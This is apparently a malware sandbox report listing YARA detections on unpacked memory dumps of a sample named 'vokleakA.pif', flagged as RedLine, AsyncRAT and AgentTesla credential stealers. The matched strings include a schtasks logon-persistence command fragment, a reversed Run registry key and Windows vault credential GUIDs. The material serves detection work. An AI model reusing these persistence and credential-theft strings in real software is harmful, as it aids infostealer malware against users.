7.2.vokleakA.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E6 88 44 24 2B 88 44 24 2F B0 CA 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
7.2.vokleakA.pif.28550000.8.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.2.vokleakA.pif.28550000.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.vokleakA.pif.28550000.8.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.vokleakA.pif.28550000.8.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4584f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x54238:$a2: Stub.exe 0x542c8:$a2: Stub.exe 0x3cacc:$a3: get_ActivatePong 0x45a67:$a4: vmware 0x458df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3c9f1:$a6: get_SslClient
7.2.vokleakA.pif.28550000.8.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x458e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
7.2.vokleakA.pif.28550000.8.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x464c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x46532:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x465bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4664e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x466b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4672a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x467c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x46850:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.vokleakA.pif.33005570.7.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
4.2.vokleakA.pif.33005570.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.vokleakA.pif.33005570.7.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.vokleakA.pif.33005570.7.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x46737:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x55120:$a2: Stub.exe 0x551b0:$a2: Stub.exe 0x3d9b4:$a3: get_ActivatePong 0x4694f:$a4: vmware 0x467c7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3d8d9:$a6: get_SslClient
4.2.vokleakA.pif.33005570.7.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x467c9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
4.2.vokleakA.pif.33005570.7.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x473a8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4741a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x474a4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x47536:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x475a0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x47612:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x476a8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x47738:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.vokleakA.pif.31be3fde.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
4.2.vokleakA.pif.31be3fde.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.vokleakA.pif.31be3fde.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.vokleakA.pif.31be3fde.1.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x46737:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x55120:$a2: Stub.exe 0x551b0:$a2: Stub.exe 0x3d9b4:$a3: get_ActivatePong 0x4694f:$a4: vmware 0x467c7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3d8d9:$a6: get_SslClient
4.2.vokleakA.pif.31be3fde.1.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x467c9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
4.2.vokleakA.pif.31be3fde.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x473a8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4741a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x474a4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x47536:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x475a0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x47612:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x476a8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x47738:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.vokleakA.pif.32f4d590.4.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
9.2.vokleakA.pif.32f4d590.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.vokleakA.pif.32f4d590.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.vokleakA.pif.32f4d590.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.vokleakA.pif.32f4d590.4.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4764f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56038:$a2: Stub.exe 0x560c8:$a2: Stub.exe 0x3e8cc:$a3: get_ActivatePong 0x47867:$a4: vmware 0x476df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3e7f1:$a6: get_SslClient
9.2.vokleakA.pif.32f4d590.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x476e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
9.2.vokleakA.pif.32f4d590.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x482c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x48332:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x483bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4844e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x484b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4852a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x485c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x48650:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.vokleakA.pif.28550000.8.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.2.vokleakA.pif.28550000.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.vokleakA.pif.28550000.8.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.2.vokleakA.pif.28550000.8.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.vokleakA.pif.28550000.8.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4764f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56038:$a2: Stub.exe 0x560c8:$a2: Stub.exe 0x3e8cc:$a3: get_ActivatePong 0x47867:$a4: vmware 0x476df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3e7f1:$a6: get_SslClient
7.2.vokleakA.pif.28550000.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x476e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
7.2.vokleakA.pif.28550000.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x482c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x48332:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x483bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4844e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x484b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4852a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x485c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x48650:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.1.vokleakA.pif.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.1.vokleakA.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 E6 88 44 24 2B 88 44 24 2F B0 CA 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
9.2.vokleakA.pif.31b93fde.1.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
9.2.vokleakA.pif.31b93fde.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.vokleakA.pif.31b93fde.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.vokleakA.pif.31b93fde.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.vokleakA.pif.31b93fde.1.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x48537:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56f20:$a2: Stub.exe 0x56fb0:$a2: Stub.exe 0x3f7b4:$a3: get_ActivatePong 0x4874f:$a4: vmware 0x485c7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3f6d9:$a6: get_SslClient
9.2.vokleakA.pif.31b93fde.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x485c9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
9.2.vokleakA.pif.31b93fde.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x491a8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4921a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x492a4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x49336:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x493a0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x49412:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x494a8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x49538:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.vokleakA.pif.34490000.6.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
9.2.vokleakA.pif.34490000.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.vokleakA.pif.34490000.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.vokleakA.pif.34490000.6.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.vokleakA.pif.34490000.6.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x48537:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56f20:$a2: Stub.exe 0x56fb0:$a2: Stub.exe 0x3f7b4:$a3: get_ActivatePong 0x4874f:$a4: vmware 0x485c7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3f6d9:$a6: get_SslClient
9.2.vokleakA.pif.34490000.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x485c9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
9.2.vokleakA.pif.34490000.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x491a8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4921a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x492a4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x49336:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x493a0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x49412:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x494a8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x49538:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.vokleakA.pif.31be3fde.1.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
4.2.vokleakA.pif.31be3fde.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.vokleakA.pif.31be3fde.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.vokleakA.pif.31be3fde.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.vokleakA.pif.31be3fde.1.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x48537:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56f20:$a2: Stub.exe 0x56fb0:$a2: Stub.exe 0x3f7b4:$a3: get_ActivatePong 0x4874f:$a4: vmware 0x485c7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3f6d9:$a6: get_SslClient
4.2.vokleakA.pif.31be3fde.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x485c9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
4.2.vokleakA.pif.31be3fde.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x491a8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4921a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x492a4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x49336:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x493a0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x49412:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x494a8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x49538:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.vokleakA.pif.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.2.vokleakA.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 E6 88 44 24 2B 88 44 24 2F B0 CA 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
4.2.vokleakA.pif.31e40ee8.4.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
4.2.vokleakA.pif.31e40ee8.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.vokleakA.pif.31e40ee8.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.vokleakA.pif.31e40ee8.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.vokleakA.pif.31e40ee8.4.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4764f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56038:$a2: Stub.exe 0x560c8:$a2: Stub.exe 0x3e8cc:$a3: get_ActivatePong 0x47867:$a4: vmware 0x476df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3e7f1:$a6: get_SslClient
4.2.vokleakA.pif.31e40ee8.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x476e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
4.2.vokleakA.pif.31e40ee8.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x482c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x48332:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x483bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4844e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x484b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4852a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x485c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x48650:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.vokleakA.pif.284a0ee8.6.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.2.vokleakA.pif.284a0ee8.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.vokleakA.pif.284a0ee8.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.2.vokleakA.pif.284a0ee8.6.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.vokleakA.pif.284a0ee8.6.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4764f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56038:$a2: Stub.exe 0x560c8:$a2: Stub.exe 0x3e8cc:$a3: get_ActivatePong 0x47867:$a4: vmware 0x476df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3e7f1:$a6: get_SslClient
7.2.vokleakA.pif.284a0ee8.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x476e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
7.2.vokleakA.pif.284a0ee8.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x482c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x48332:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x483bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4844e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x484b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4852a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x485c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x48650:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.vokleakA.pif.32ef5570.5.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
9.2.vokleakA.pif.32ef5570.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.vokleakA.pif.32ef5570.5.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.vokleakA.pif.32ef5570.5.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x46737:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x55120:$a2: Stub.exe 0x551b0:$a2: Stub.exe 0x3d9b4:$a3: get_ActivatePong 0x4694f:$a4: vmware 0x467c7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3d8d9:$a6: get_SslClient
9.2.vokleakA.pif.32ef5570.5.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x467c9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
9.2.vokleakA.pif.32ef5570.5.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x473a8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4741a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x474a4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x47536:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x475a0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x47612:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x476a8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x47738:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.1.vokleakA.pif.400000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
7.1.vokleakA.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E6 88 44 24 2B 88 44 24 2F B0 CA 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
7.2.vokleakA.pif.25de4ec6.2.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.2.vokleakA.pif.25de4ec6.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.vokleakA.pif.25de4ec6.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.2.vokleakA.pif.25de4ec6.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.vokleakA.pif.25de4ec6.2.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4764f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56038:$a2: Stub.exe 0x560c8:$a2: Stub.exe 0x3e8cc:$a3: get_ActivatePong 0x47867:$a4: vmware 0x476df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3e7f1:$a6: get_SslClient
7.2.vokleakA.pif.25de4ec6.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x476e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
7.2.vokleakA.pif.25de4ec6.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x482c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x48332:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x483bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4844e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x484b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4852a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x485c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x48650:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.vokleakA.pif.31be4ec6.2.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
4.2.vokleakA.pif.31be4ec6.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.vokleakA.pif.31be4ec6.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.vokleakA.pif.31be4ec6.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.vokleakA.pif.31be4ec6.2.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4764f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56038:$a2: Stub.exe 0x560c8:$a2: Stub.exe 0x3e8cc:$a3: get_ActivatePong 0x47867:$a4: vmware 0x476df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3e7f1:$a6: get_SslClient
7.2.vokleakA.pif.2701d590.5.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.2.vokleakA.pif.2701d590.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.vokleakA.pif.2701d590.5.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.vokleakA.pif.2701d590.5.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4584f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x54238:$a2: Stub.exe 0x542c8:$a2: Stub.exe 0x3cacc:$a3: get_ActivatePong 0x45a67:$a4: vmware 0x458df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3c9f1:$a6: get_SslClient
